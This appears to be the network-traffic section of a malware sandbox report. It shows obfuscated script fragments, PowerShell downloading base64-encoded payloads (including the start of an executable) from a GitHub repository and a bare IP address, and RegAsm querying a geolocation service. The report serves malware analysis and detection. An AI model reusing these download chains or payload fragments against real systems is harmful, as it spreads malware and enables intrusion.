                                                                                                                                      Data Raw: ff fe 4b 00 52 00 50 00 5a 00 4c 00 5a 00 4b 00 55 00 6a 00 6d 00 5a 00 4c 00 47 00 4b 00 61 00 62 00 64 00 4c 00 71 00 6f 00 47 00 61 00 52 00 68 00 72 00 69 00 52 00 65 00 7a 00 54 00 68 00 61 00 4c 00 69 00 4b 00 6f 00 6a 00 6c 00 20 00 3d 00 20 00 22 00 65 00 4c 00 49 00 4b 00 41 00 6f 00 71 00 49 00 52 00 43 00 55 00 42 00 75 00 73 00 52 00 53 00 41 00 52 00 4c 00 61 00 66 00 78 00 57 00 4b 00 41 00 64 00 57 00 54 00 4b 00 73 00 52 00 55 00 43 00 6b 00 41 00 6c 00 4c 00 4c 00 22 00 0d 00 0a 00 64 00 55 00 6d 00 6a 00 69 00 55 00 69 00 55 00 75 00 74 00 6a 00 70 00 47 00 68 00 70 00 64 00 54 00 55 00 74 00 63 00 62 00 63 00 6b 00 73 00 63 00 6b 00 50 00 4f 00 4c 00 6c 00 67 00 66 00 74 00 6e 00 6e 00 6d 00 4c 00 4c 00 20 00 3d 00 20 00 22 00 78 00 74 00 63 00 5a 00 55 00 57 00 5a 00 4b 00 54 00 61 00 4e 00 6d 00 57 00 42 00 4c 00 47 00 4c 00 42 00 61 00 47 00 55 00 43 00 41 00 71 00 4b 00 43 00 52 00 64 00 49 00 74 00 4a 00 43 00 75 00 76 00 6b 00 71 00 47 00 64 00 22 00 0d 00 0a 00 6c 00 52 00 [TRUNCATED]
                                                                                                                                      Data Ascii: KRPZLZKUjmZLGKabdLqoGaRhriRezThaLiKojl = "eLIKAoqIRCUBusRSARLafxWKAdWTKsRUCkAlLL"dUmjiUiUutjpGhpdTUtcbcksckPOLlgftnnmLL = "xtcZUWZKTaNmWBLGLBaGUCAqKCRdItJCuvkqGd"lRxkzNxJWRoCUtGRSdCcaHUcLiKCpCHPZKAAcU = "TNPznutridordbLPjiliKBBBAGKckupLKWxLKgqLvhLb"LokaxBOeGOegzWcLzTQkdCvLxUGOkOqWCGSmKb = "hTIsPWauponutridorKPLWPJmiksizfZleLustkKKhQB"urUHKuGSpxKGsfcHWLeAQiiPLctkmtLCntLNmK = "KUWlpiUApPWgWmkqeKLGZGNbGZidzZLLnbqbPL"LiKWietUcLfeLlxmKCKJtrzGLhBneLtLn
                                                                                                                                      Oct 5, 2024 14:52:49.540055990 CEST1236INData Raw: 00 76 00 57 00 73 00 70 00 6b 00 20 00 3d 00 20 00 22 00 64 00 66 00 41 00 50 00 70 00 4f 00 4c 00 63 00 69 00 65 00 7a 00 57 00 52 00 5a 00 55 00 69 00 47 00 4b 00 6d 00 4c 00 4c 00 63 00 4b 00 73 00 70 00 54 00 62 00 4c 00 65 00 47 00 62 00 78
                                                                                                                                      Data Ascii: vWspk = "dfAPpOLciezWRZUiGKmLLcKspTbLeGbxiOLilh"NWfjNfCKWkOhLWtLUbdKHkArLZWqkGoWKxOKki = "fojQKzURcLCcLaWiCPUGWuziUxchz
                                                                                                                                      Oct 5, 2024 14:52:49.540090084 CEST1236INData Raw: 00 47 00 68 00 5a 00 65 00 6e 00 78 00 4c 00 71 00 75 00 57 00 57 00 42 00 22 00 0d 00 0a 00 6e 00 68 00 64 00 50 00 75 00 4b 00 4e 00 5a 00 65 00 7a 00 62 00 73 00 57 00 71 00 64 00 4f 00 57 00 4b 00 68 00 4a 00 72 00 68 00 63 00 71 00 6b 00 69
                                                                                                                                      Data Ascii: GhZenxLquWWB"nhdPuKNZezbsWqdOWKhJrhcqkigmLrfcBLLeWP = "ikeKcdWixWZGdieiPBGLccccWUmWWmkBUgoUzp"kzlRRseGuGhZNdWWLAWUuTO
                                                                                                                                      Oct 5, 2024 14:52:49.540124893 CEST1236INData Raw: 00 6b 00 5a 00 47 00 62 00 57 00 70 00 57 00 4c 00 4c 00 69 00 57 00 57 00 54 00 52 00 43 00 4c 00 63 00 4c 00 20 00 3d 00 20 00 22 00 47 00 63 00 6c 00 69 00 51 00 43 00 4c 00 43 00 4c 00 6e 00 4b 00 6d 00 4b 00 5a 00 75 00 4c 00 70 00 47 00 4a
                                                                                                                                      Data Ascii: kZGbWpWLLiWWTRCLcL = "GcliQCLCLnKmKZuLpGJqsBzCInutridoroGeqpuZmlGc"UlaGGeJKmszxGPvxtILeaqcWqNUfGPBlpivZIj = "ULKWPWGfNm
                                                                                                                                      Oct 5, 2024 14:52:49.540157080 CEST1236INData Raw: 00 3d 00 20 00 22 00 78 00 42 00 47 00 4b 00 4c 00 52 00 6d 00 66 00 4b 00 4c 00 65 00 57 00 6e 00 41 00 6f 00 6b 00 7a 00 50 00 66 00 50 00 75 00 4e 00 62 00 62 00 52 00 6f 00 5a 00 51 00 57 00 78 00 53 00 47 00 65 00 7a 00 63 00 6b 00 63 00 70
                                                                                                                                      Data Ascii: = "xBGKLRmfKLeWnAokzPfPuNbbRoZQWxSGezckcp"HooephqLNIRkLUuOckCpZQUnfzWacznoocifCK = "LObNWRLZBJKULpeeSvelzGLcUrRLBazrWbp
                                                                                                                                      Oct 5, 2024 14:52:49.540189981 CEST1120INData Raw: 00 6c 00 69 00 4b 00 61 00 41 00 4b 00 22 00 0d 00 0a 00 6f 00 4c 00 71 00 4c 00 78 00 41 00 70 00 4c 00 76 00 69 00 6f 00 42 00 62 00 6c 00 63 00 65 00 49 00 42 00 4f 00 70 00 47 00 51 00 70 00 4c 00 69 00 4c 00 4f 00 57 00 6e 00 70 00 61 00 43
                                                                                                                                      Data Ascii: liKaAK"oLqLxApLvioBblceIBOpGQpLiLOWnpaCGLKujp = "iQWjiboTBOoknhfPKuqBWipPiAmTQkQSWsWOap"zeRWSPincPRhApuemLfcsWeLWlLeI
                                                                                                                                      Oct 5, 2024 14:52:49.540224075 CEST1236INData Raw: 00 4c 00 43 00 61 00 63 00 48 00 4c 00 4c 00 63 00 4e 00 57 00 57 00 4b 00 61 00 57 00 6e 00 4b 00 55 00 71 00 62 00 65 00 63 00 63 00 55 00 41 00 55 00 6a 00 75 00 57 00 47 00 55 00 4e 00 70 00 50 00 5a 00 43 00 22 00 0d 00 0a 00 57 00 4b 00 63
                                                                                                                                      Data Ascii: LCacHLLcNWWKaWnKUqbeccUAUjuWGUNpPZC"WKcUlZUiAxaPSNxbWGxzqNiWLoTWomKWALWdLx = "xchmGBZLZmzKkdUfCuxqSLzdeUGQNfoRCLIUbU"
                                                                                                                                      Oct 5, 2024 14:52:49.540256977 CEST1236INData Raw: 00 43 00 57 00 4a 00 47 00 4b 00 47 00 6f 00 6f 00 47 00 4b 00 73 00 47 00 6c 00 7a 00 52 00 64 00 22 00 0d 00 0a 00 78 00 4c 00 47 00 6b 00 68 00 65 00 6f 00 41 00 6d 00 6d 00 71 00 41 00 57 00 57 00 6f 00 4c 00 57 00 57 00 64 00 4c 00 41 00 66
                                                                                                                                      Data Ascii: CWJGKGooGKsGlzRd"xLGkheoAmmqAWWoLWWdLAfiKvNmpclQGqpiluN = "idGWpdNbeuAoGOSUfcGxzLkfKicWCKfLtLGUla"HPoWCbmIPKWgBulOeaL
                                                                                                                                      Oct 5, 2024 14:52:49.540288925 CEST1236INData Raw: 00 55 00 75 00 69 00 4c 00 50 00 6d 00 65 00 50 00 6b 00 57 00 6a 00 68 00 74 00 57 00 65 00 69 00 6b 00 55 00 70 00 49 00 42 00 6e 00 55 00 70 00 4c 00 6e 00 20 00 3d 00 20 00 22 00 6d 00 55 00 42 00 57 00 78 00 6d 00 51 00 62 00 68 00 62 00 52
                                                                                                                                      Data Ascii: UuiLPmePkWjhtWeikUpIBnUpLn = "mUBWxmQbhbRBzUKAiepZRKQiKgWeLZBfouRWiI"dkLuchRdWLskLCqboGWLLAgebJckWPWKliKoxx = "WpJWjPkJ
                                                                                                                                      Oct 5, 2024 14:52:49.540327072 CEST1236INData Raw: 00 22 00 55 00 71 00 52 00 4f 00 78 00 4b 00 4c 00 62 00 65 00 78 00 47 00 4b 00 76 00 63 00 5a 00 41 00 4c 00 69 00 6d 00 61 00 63 00 5a 00 69 00 47 00 72 00 6c 00 66 00 68 00 4b 00 52 00 7a 00 4b 00 63 00 71 00 57 00 4c 00 66 00 57 00 22 00 0d
                                                                                                                                      Data Ascii: "UqROxKLbexGKvcZALimacZiGrlfhKRzKcqWLfW"NenbppuAGLpchTbuUUpsngTbqdpnGaGZUiIkKa = "qWhilNoiWhRNaKhnGCgfLpnutridorLRteiBL
                                                                                                                                      Oct 5, 2024 14:52:49.545192957 CEST1236INData Raw: 00 42 00 4c 00 6d 00 69 00 6d 00 50 00 6c 00 61 00 4c 00 71 00 47 00 53 00 63 00 69 00 4c 00 5a 00 22 00 0d 00 0a 00 69 00 6d 00 43 00 57 00 47 00 55 00 63 00 63 00 6f 00 68 00 4c 00 71 00 55 00 67 00 57 00 4c 00 65 00 78 00 4a 00 69 00 47 00 5a
                                                                                                                                      Data Ascii: BLmimPlaLqGSciLZ"imCWGUccohLqUgWLexJiGZfJIxSihLWSNUelzu = "pfaLAKpLPgliqbBRRLcOpuUmmzLxWKRxcqxKeK"ZjrKJKzUScLWukfeLCL


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.2249163107.172.130.147803696C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 5, 2024 14:52:56.966897011 CEST78OUTGET /240/NNCCE.txt HTTP/1.1
                                                                                                                                      Host: 107.172.130.147
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Oct 5, 2024 14:52:57.442857981 CEST1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Sat, 05 Oct 2024 12:52:57 GMT
                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                      Last-Modified: Thu, 03 Oct 2024 02:11:46 GMT
                                                                                                                                      ETag: "a1000-62389139ede85"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 659456
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: text/plain
                                                                                                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                      Oct 5, 2024 14:52:57.442874908 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                      Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                                                                                                                      Oct 5, 2024 14:52:57.442884922 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                                                                                                                      Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                                                                                                                      Oct 5, 2024 14:52:57.442898035 CEST1236INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                                                                                                                      Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD7
                                                                                                                                      Oct 5, 2024 14:52:57.442913055 CEST1236INData Raw: 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67
                                                                                                                                      Data Ascii: wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYN
                                                                                                                                      Oct 5, 2024 14:52:57.442928076 CEST1236INData Raw: 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44
                                                                                                                                      Data Ascii: kD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODj
                                                                                                                                      Oct 5, 2024 14:52:57.442939997 CEST1236INData Raw: 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75
                                                                                                                                      Data Ascii: o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcO
                                                                                                                                      Oct 5, 2024 14:52:57.442953110 CEST1236INData Raw: 74 7a 49 37 73 78 4f 51 73 7a 42 36 45 76 4f 62 72 44 6f 36 55 70 4f 4d 71 7a 57 36 4d 56 4f 47 6e 54 74 35 55 61 4f 64 6d 44 6a 35 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a 4e 4a 57 54 64 31 67 56 4e 68 51 7a
                                                                                                                                      Data Ascii: tzI7sxOQszB6EvObrDo6UpOMqzW6MVOGnTt5UaOdmDj5wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP
                                                                                                                                      Oct 5, 2024 14:52:57.442964077 CEST776INData Raw: 77 39 4d 4c 50 54 71 7a 38 35 4d 53 4f 54 69 7a 38 32 4d 65 4e 54 4b 7a 41 79 4d 50 4d 7a 41 79 67 75 4d 58 4c 6a 6f 79 73 70 4d 75 4a 7a 5a 78 34 61 4d 79 45 6a 48 77 49 43 41 41 45 41 6b 41 51 41 67 41 41 41 41 2f 63 39 50 6e 2b 6a 64 2f 59 53
                                                                                                                                      Data Ascii: w9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjHwICAAEAkAQAgAAAA/c9Pn+jd/YSPzxzS4kIOlUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6wcLMFCAAAgDAEAHAAAgP77D8+4QPk3ju90YP71zB8s0OzvTy7M6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP
                                                                                                                                      Oct 5, 2024 14:52:57.442975044 CEST1236INData Raw: 34 47 4d 6a 42 44 53 77 51 43 4d 49 41 41 41 41 67 4c 41 45 41 44 41 2f 59 76 50 66 36 54 67 2b 4d 6d 50 65 30 44 4e 39 63 53 50 58 30 6a 43 38 49 46 50 53 77 44 41 37 4d 2f 4f 6f 76 44 78 37 51 35 4f 48 75 54 62 37 49 67 4f 43 6e 7a 48 35 6f 77
                                                                                                                                      Data Ascii: 4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkNoUza1ITNMQD0zM/MBID0yITMtHjuxgWM7EjDwwFAAAAMAQAEAAAA/c6P35TK9IePH2Te7EkO1lTS4kLOTijd3QoNeazN2QSNxXTwzciM
                                                                                                                                      Oct 5, 2024 14:52:57.447902918 CEST1236INData Raw: 4c 7a 77 79 45 71 4d 62 4b 54 6a 79 67 6f 4d 43 4b 44 66 79 59 6e 4d 78 4a 7a 61 79 55 6d 4d 66 4a 6a 57 79 51 6c 4d 4f 4a 44 53 79 4d 6b 4d 39 49 7a 4e 79 45 6a 4d 73 49 6a 4a 79 41 69 4d 61 49 54 46 79 38 67 4d 4a 49 7a 41 78 34 66 4d 34 48 6a
                                                                                                                                      Data Ascii: LzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FTexQXMuFDaxIWMdFzVxEVMLFjRxAUM6EDNx8SMpEzIx0RMYEjExwQMGETAwsPM1Dz7woOMkDj3wgNMTDTzwcMMBDDvwYLMwCjqwUKMfCTm


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.2249166178.237.33.50803816C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 5, 2024 14:53:00.327765942 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                      Host: geoplugin.net
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Oct 5, 2024 14:53:00.948255062 CEST1170INHTTP/1.1 200 OK
                                                                                                                                      date: Sat, 05 Oct 2024 12:53:00 GMT
                                                                                                                                      server: Apache
                                                                                                                                      content-length: 962
                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                      cache-control: public, max-age=300
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.2249162185.199.109.1334433696C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-05 12:52:54 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-10-05 12:52:54 UTC900INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 2935468
                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: deny
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      X-GitHub-Request-Id: DDF4:38977D:9189:AF2E:670136A5
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Date: Sat, 05 Oct 2024 12:52:54 GMT
                                                                                                                                      Via: 1.1 varnish
                                                                                                                                      X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                                                      X-Cache: MISS
                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                      X-Timer: S1728132775.523112,VS0,VE119
                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      X-Fastly-Request-ID: 661a49c73d23f50e7a31341aee09b1a5e973c8a5
                                                                                                                                      Expires: Sat, 05 Oct 2024 12:57:54 GMT
                                                                                                                                      Source-Age: 0
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
